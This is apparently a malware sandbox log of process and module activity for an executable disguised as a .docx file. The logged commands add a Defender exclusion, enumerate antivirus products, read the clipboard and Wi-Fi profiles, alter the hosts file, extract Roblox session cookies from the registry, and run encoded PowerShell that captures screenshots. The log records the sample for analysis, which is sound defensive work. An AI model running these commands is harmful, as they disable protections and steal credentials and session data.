Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?.scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4z11l1tq\4z11l1tq.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1CC2.tmp" "c:\Users\user\AppData\Local\Temp\4z11l1tq\CSC8AFA9231FD50466BA346A9DBA2A34956.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Cooperative Agreement0000800380.docx.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: twinui.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: twinui.appcore.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: mrmcorer.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: windows.staterepositorycore.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: bcp47mrm.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: windows.ui.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: windowmanagementapi.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\calc.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: vccorlib140_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: msvcp140_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: concrt140_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: vcruntime140_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: vcruntime140_app.dll	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe	Section loaded: vcruntime140_app.dll	Jump to behavior
